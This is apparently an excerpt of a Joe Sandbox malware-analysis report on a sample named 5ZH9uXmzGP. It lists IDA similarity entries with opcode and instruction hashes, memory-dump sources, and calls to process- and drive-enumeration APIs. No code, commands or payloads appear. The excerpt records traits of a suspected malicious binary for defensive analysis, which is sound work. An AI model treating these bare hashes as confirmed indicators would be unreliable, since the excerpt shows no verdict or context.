                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: be44194eb7fd650370f729db105fd091f5f9b09c9ff46a667e0f0bb16f97589d
                                                            • Instruction ID: efed6960afc038b70bcc60b3e31b9ee3a129f8e427de5d620de8241f87313aac
                                                            • Opcode Fuzzy Hash: be44194eb7fd650370f729db105fd091f5f9b09c9ff46a667e0f0bb16f97589d
                                                            • Instruction Fuzzy Hash: A0A1D0EB58C133BDB3C2C5856B54AFBA76EE2D67303308426F407D6602EA944E895DF1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: df784e1b7cb89c2462cec44a1b330cb9220bf6884c4fbfb49ee60f11268ff459
                                                            • Instruction ID: a6e6020610bc0437be3f3f183904d2a188d147f79af66c96c89d287955ba36ec
                                                            • Opcode Fuzzy Hash: df784e1b7cb89c2462cec44a1b330cb9220bf6884c4fbfb49ee60f11268ff459
                                                            • Instruction Fuzzy Hash: 79A102EB58D133BEB3C2C5856B54AF7A76EE2D67303308426F407D6602EA944E894DF1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 3d4d8b34bd9e7df089e520e7f4eb9663f599f8a652f4e2e1425390e5953b5073
                                                            • Instruction ID: ff4d1475ba9e72f0ca656257b8e62196a3bf2a6dcb0f8ee112dd54202d54ebea
                                                            • Opcode Fuzzy Hash: 3d4d8b34bd9e7df089e520e7f4eb9663f599f8a652f4e2e1425390e5953b5073
                                                            • Instruction Fuzzy Hash: 3261C5EB52D324AF73C287855B74AFA6B5EE6D6730331A426F607D2503E2E50B4A01F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: ee0ea27bd477756443a7da774144f60cdb106f8767959342276e179838220e32
                                                            • Instruction ID: e1afcc175e659db7b5d5d20cd8003d516ea6a07bf2e812395aa317a540ff04a9
                                                            • Opcode Fuzzy Hash: ee0ea27bd477756443a7da774144f60cdb106f8767959342276e179838220e32
                                                            • Instruction Fuzzy Hash: 455149E752D311AFB7C2C7915B74AFA2B6DDAD6730331A026FA07C7103E2A44A4641F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 463f7e55c284cf9aee49fee2d045e388ebaa878978a997ee0ab6fd47bd941736
                                                            • Instruction ID: 7c681ac823bea5ea9f35078a2260bb8481f810b628a5f900c2eb083164c68945
                                                            • Opcode Fuzzy Hash: 463f7e55c284cf9aee49fee2d045e388ebaa878978a997ee0ab6fd47bd941736
                                                            • Instruction Fuzzy Hash: 5951F4E752D315AF73C283855B74AFA676EE6D67703309426FA07D2603E6E40A8A01F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: eb3d519719ab641f07be2ac73b6f32f0b5e08f1f92ce91fb7e554d85df66cdc9
                                                            • Instruction ID: 7b7c3980a9a53fea67c81291b05783e7cd66dede6cc2fb1e068af5d06e7f91e4
                                                            • Opcode Fuzzy Hash: eb3d519719ab641f07be2ac73b6f32f0b5e08f1f92ce91fb7e554d85df66cdc9
                                                            • Instruction Fuzzy Hash: 6E4105F712D311AFB3C287915B74AFA6B5EDAD67303319026FA07C2603E6E40A4A01F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 5ba3a1d46be5f44fea4b98157febb13eb8cb7c051ae6af61f4d0ceb45f649c4d
                                                            • Instruction ID: 7f7e7e9bcf1de5e32421bc112a1fba4716d747af68d949e374e4ecd0a0d45db2
                                                            • Opcode Fuzzy Hash: 5ba3a1d46be5f44fea4b98157febb13eb8cb7c051ae6af61f4d0ceb45f649c4d
                                                            • Instruction Fuzzy Hash: 344104E752D321AFB3C283951B74AFA6B5EDAD67303309466F607C3603E2A40A4A01B1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 739de2cc2be504e740391f83085a0c79de0d82ca0f4db6b6638abf17153f845c
                                                            • Instruction ID: 9816abb2fd55ba9428b1b55b0a58b406b6542436aa8532f09975caa5658fd239
                                                            • Opcode Fuzzy Hash: 739de2cc2be504e740391f83085a0c79de0d82ca0f4db6b6638abf17153f845c
                                                            • Instruction Fuzzy Hash: 4E415AE713D311AFB7C283511B74AFA2B6EDAD6330330A066F607C2603E2D40A8641F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 0af7056d9e723bf04ff064ecfbc30d2077b04c88b076db3fb51579b20266447b
                                                            • Instruction ID: 9f8b8ce76bac554e9ce6a8989c409e82cedb94e9ca73eda96fab9711e10092cf
                                                            • Opcode Fuzzy Hash: 0af7056d9e723bf04ff064ecfbc30d2077b04c88b076db3fb51579b20266447b
                                                            • Instruction Fuzzy Hash: 4D4127E752D315AFB3C2C3911B74AFA275EDAD67703309026F607D2603E6E40A4A01F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: d2a76f20a09504fdb4ffee64566a05a2c9ef63463713dc4772ef07333a71c04d
                                                            • Instruction ID: 23ab4dafd88c7df2da7369ad5e8dc9f8a08125456a489fdb59cd7badca1f0dd3
                                                            • Opcode Fuzzy Hash: d2a76f20a09504fdb4ffee64566a05a2c9ef63463713dc4772ef07333a71c04d
                                                            • Instruction Fuzzy Hash: DF4107E752D311AFB3C283951B74AFA675EDAD67303309066B607D2603E6E40A4601F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 589e4665349f474dc738ea27e63e8788eb7356c7f5dd2fe5df563c575806c3ee
                                                            • Instruction ID: 5cfc7548ce94918d9f98a75496870cfe6879cfab3b70af2bb6e948ef6dee7db2
                                                            • Opcode Fuzzy Hash: 589e4665349f474dc738ea27e63e8788eb7356c7f5dd2fe5df563c575806c3ee
                                                            • Instruction Fuzzy Hash: 7B4104E752C321AFB3C283951B74AFA6B5EDAD67703319066B607D3603E6E40A4601F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: ab09f4a959849bede4d67c6293c80d9bb8b3296d659b26a6fe1752f6ae80a900
                                                            • Instruction ID: 7e6b15a649b96b0a5b5a50b7dbde2e6f92227463880c6f4565761c7627284158
                                                            • Opcode Fuzzy Hash: ab09f4a959849bede4d67c6293c80d9bb8b3296d659b26a6fe1752f6ae80a900
                                                            • Instruction Fuzzy Hash: E14136A753D321AFB7C283911B74AFA675EDAD6770331A066FA07C7603E2D40A8601F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: a9be2eea46b203e14561367f596c17e4edf6029702a28cd82fbaf65e469ba19e
                                                            • Instruction ID: c453531232376bb9e6c8bfe178a34bdade0c39eacc1e7d6de11363ceb8d1f9f1
                                                            • Opcode Fuzzy Hash: a9be2eea46b203e14561367f596c17e4edf6029702a28cd82fbaf65e469ba19e
                                                            • Instruction Fuzzy Hash: 50213BEB24E031BEB39294456F55EFA672EE1EA770730C42BF407C6542EA844F8A10F1
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 4a7f635faea141cfb271248bfe18d79d86a36a68a1e47cf401df06e202a27613
                                                            • Instruction ID: d5c367645ace46571bcbf69d44c14f76c28b59c6298760582ce00723a21c7613
                                                            • Opcode Fuzzy Hash: 4a7f635faea141cfb271248bfe18d79d86a36a68a1e47cf401df06e202a27613
                                                            • Instruction Fuzzy Hash: CA218CE724E031BEB3C690596F51EFB275EE1EA730330C42BB407C6582EA844A8A00F5
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: c1d091f5de23bff4d914b5b5aa54b785f339edd0bbe27ae79f541c2f0d5e2bc0
                                                            • Instruction ID: a911755b69618b452a5c91c758232c060283338af4db80e2e61600de0edf2a04
                                                            • Opcode Fuzzy Hash: c1d091f5de23bff4d914b5b5aa54b785f339edd0bbe27ae79f541c2f0d5e2bc0
                                                            • Instruction Fuzzy Hash: F0216AE724E131BEB3C2D459AE51EFA276EE5E6730730C42BF407C6442EA841A8A10F1
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: c5215e00e058175781e73e66c3ad22206586b22898d7f1540a31b3fe40d3ba52
                                                            • Instruction ID: 506e78e4f8ffb751d6aad4e54370c93f80d17674ca01dc3c8a312336acce1597
                                                            • Opcode Fuzzy Hash: c5215e00e058175781e73e66c3ad22206586b22898d7f1540a31b3fe40d3ba52
                                                            • Instruction Fuzzy Hash: 1A112EE724E071BEB3C290596E51EFA171EE5E6730730C52BF447C6542EA844B4A10F1
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 88dbe33f6ac6edfd21e4b083aacc2ac2ff089b8369e85f706d01071ecd089790
                                                            • Instruction ID: dc94f458181390b1134d53cf60c807777b18ad4525f10e3a1fab904839ba4c7e
                                                            • Opcode Fuzzy Hash: 88dbe33f6ac6edfd21e4b083aacc2ac2ff089b8369e85f706d01071ecd089790
                                                            • Instruction Fuzzy Hash: ED11E8E721E135BE73C2D1566F51EFA272DE1E6730730C42BB406C6542EA850B9910F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: E
                                                            • API String ID: 0-3568589458
                                                            • Opcode ID: 3690b06d4d40a6358ed0f5f5385fe044d04b8885075d2e26acdadeac2a4767db
                                                            • Instruction ID: 767234555a92c473260ec9b4b56ca8bf0c6a7cd359978dbe2a2228ad4982a079
                                                            • Opcode Fuzzy Hash: 3690b06d4d40a6358ed0f5f5385fe044d04b8885075d2e26acdadeac2a4767db
                                                            • Instruction Fuzzy Hash: F641B1E720C314BDB3C2D9826B54AFB666EE6DA730F38A427F807D5502E2951F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 51422c4808b2568f2843080f49762837f66d88d79479e5cea083777c57424d8f
                                                            • Instruction ID: 3e604220f691eb3f30b395e5dc47518c3a806493a902243e6843bcb71b40651d
                                                            • Opcode Fuzzy Hash: 51422c4808b2568f2843080f49762837f66d88d79479e5cea083777c57424d8f
                                                            • Instruction Fuzzy Hash: 0D71B6EB14C314BDB2C2D9866B54AFA672EE1D6730F38B427F807D9546E2940F8B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd221b85768edc7bc095dbf7f0cc589fed499f178a9a217a49b7e10e7718ba98
                                                            • Instruction ID: a5417e904183eb3a8019b7e8ed2a25f6b713e2855f155387578b62f9ae70f456
                                                            • Opcode Fuzzy Hash: dd221b85768edc7bc095dbf7f0cc589fed499f178a9a217a49b7e10e7718ba98
                                                            • Instruction Fuzzy Hash: 0351A6EB14D314BDB7C289826B54AFB572EE2DA730F38A427F807D9646D2941F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05a99421d850a57c8e17949889a2851246e7da96925e33986a449f44f4b5e566
                                                            • Instruction ID: 91afc2005a22b6d19e565b3a6ecf85de3a2f6c7fc1e4d5352c2c06d4908761b7
                                                            • Opcode Fuzzy Hash: 05a99421d850a57c8e17949889a2851246e7da96925e33986a449f44f4b5e566
                                                            • Instruction Fuzzy Hash: 2151E5EB14D314BDB3C2C9426B54AFA672EE6DA730F38A427F807D9646D2940F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bc3a22fdcd978dc270be3580794fd57d0611d30a1b75acdd9e902edc6b8c48f
                                                            • Instruction ID: 346bcc6a45affff403be88f12531132c3f043c3341992907bcdd4d4dd7ba2a24
                                                            • Opcode Fuzzy Hash: 9bc3a22fdcd978dc270be3580794fd57d0611d30a1b75acdd9e902edc6b8c48f
                                                            • Instruction Fuzzy Hash: 5951A5EB14C314BDB3C289466B54AFB572EE2DA730F38A427F807D9646D2941F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 48bb0bb400260963789c8d86437b356f3ee0ed3ec618cc28313b0737e09083dc
                                                            • Instruction ID: e1576cc38b4e9156eb94deede636bad8b60b27fc916e5dc8b08264861f2c1cae
                                                            • Opcode Fuzzy Hash: 48bb0bb400260963789c8d86437b356f3ee0ed3ec618cc28313b0737e09083dc
                                                            • Instruction Fuzzy Hash: BA51B6EB14C314BDB7C289426B54AFA672EE2DA730F38A427F817D9646D2941F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8c713f84420d3e80d72c8ab6b0fe5eea083b8f0bf5630df17a5449040a06e34
                                                            • Instruction ID: 735d0d634c0fe7cda503cfe9e61a27d3959b5db3c288a730b18f2eb917d13677
                                                            • Opcode Fuzzy Hash: f8c713f84420d3e80d72c8ab6b0fe5eea083b8f0bf5630df17a5449040a06e34
                                                            • Instruction Fuzzy Hash: B451F4EB14D314BDB3C2C9426B54AFA6B2DE6DA730B38A427F807D9546E2941F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15276d827f7f0b383dbe9148c6cfeff7d2907062ead421f0cf546586543f888b
                                                            • Instruction ID: 2d2170f0ba3fda4591ef180d85d2a1c92e4f00bceb24fd59c912b050c3a53840
                                                            • Opcode Fuzzy Hash: 15276d827f7f0b383dbe9148c6cfeff7d2907062ead421f0cf546586543f888b
                                                            • Instruction Fuzzy Hash: F151D7E714C314BDB38299416B54AFB672DE6DA730F38A427F807DA546D2941F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f1f139092b86a25225748f0e5fe45775e3c05bb0aecaeedee43f9fc51d5e3af
                                                            • Instruction ID: f7073346ccca4de782abe83f3b369ac0701ca2ef8347bfcaa119f966d0aa1ddd
                                                            • Opcode Fuzzy Hash: 8f1f139092b86a25225748f0e5fe45775e3c05bb0aecaeedee43f9fc51d5e3af
                                                            • Instruction Fuzzy Hash: E251B5EB14C314BDB7C299426B54AFB672EE2DA730F38A427F807D5646D2941F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7e1014ffba54a54c063973912796f7fce9c68bf2f52ec3c47a4043147338847a
                                                            • Instruction ID: d3ef2ca3062995333d82a0852e15be03fa739c3e2bb759498dae8a138b7d1a5b
                                                            • Opcode Fuzzy Hash: 7e1014ffba54a54c063973912796f7fce9c68bf2f52ec3c47a4043147338847a
                                                            • Instruction Fuzzy Hash: 4951F7EB14C314BDB7C2C9426B54AFB6B2DE6D6730B38A427F807D9506E2941F4B50B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1648c0ec4dcb17d45f8f612760ef9cff2140ab20abb6a763cb7e98c79ef2ed0a
                                                            • Instruction ID: 66c15ccb124ee4b16bd8faaebdd62bacec3df70a6795f52049ecbebc6a9748b9
                                                            • Opcode Fuzzy Hash: 1648c0ec4dcb17d45f8f612760ef9cff2140ab20abb6a763cb7e98c79ef2ed0a
                                                            • Instruction Fuzzy Hash: 3D5194EB14C314BDB7C299426B54AFA672EE2DA730F38A427F807D5646E3941F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35b0d8ae76998756d9ce2b342e569fe957f83c2c02329d6573f5c592f9623865
                                                            • Instruction ID: bee20205763b196f1876728f455f8cbb5d3b2267919555b89b2f48a11b4212a8
                                                            • Opcode Fuzzy Hash: 35b0d8ae76998756d9ce2b342e569fe957f83c2c02329d6573f5c592f9623865
                                                            • Instruction Fuzzy Hash: C251E6EB14C310BDB7C289426B54AFB672EE2DA730F38A427F807D9546E2951F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6dbcefa6c9738216e84e385640d7e389739e1463dc46412f939c37a419288220
                                                            • Instruction ID: 629e9d762db5ec45597e44ac26d530e84f6bb38c9bfb29802cdee3a5e1d71bdf
                                                            • Opcode Fuzzy Hash: 6dbcefa6c9738216e84e385640d7e389739e1463dc46412f939c37a419288220
                                                            • Instruction Fuzzy Hash: 9851B5EB14C314BDB7C299426B54AFB672EE2DA730F38A427F807D9606D2951F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f37106e897b7861cd07dc3825958f2a0a99f0f68b81a9e04bf07f7b4b471919
                                                            • Instruction ID: 4ea237aaa7590708cc23353a57419ce9141c85dbafad38e87cd2a29587af7a5f
                                                            • Opcode Fuzzy Hash: 5f37106e897b7861cd07dc3825958f2a0a99f0f68b81a9e04bf07f7b4b471919
                                                            • Instruction Fuzzy Hash: 014183EB14C314BDB3C299426B54AFB672EE2DA730B38A427F807D9546D2951F4B10B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dcaf084f9a3c2247231aa981339b9a2241e36775a97a8d2ffd081bdab8ebaea1
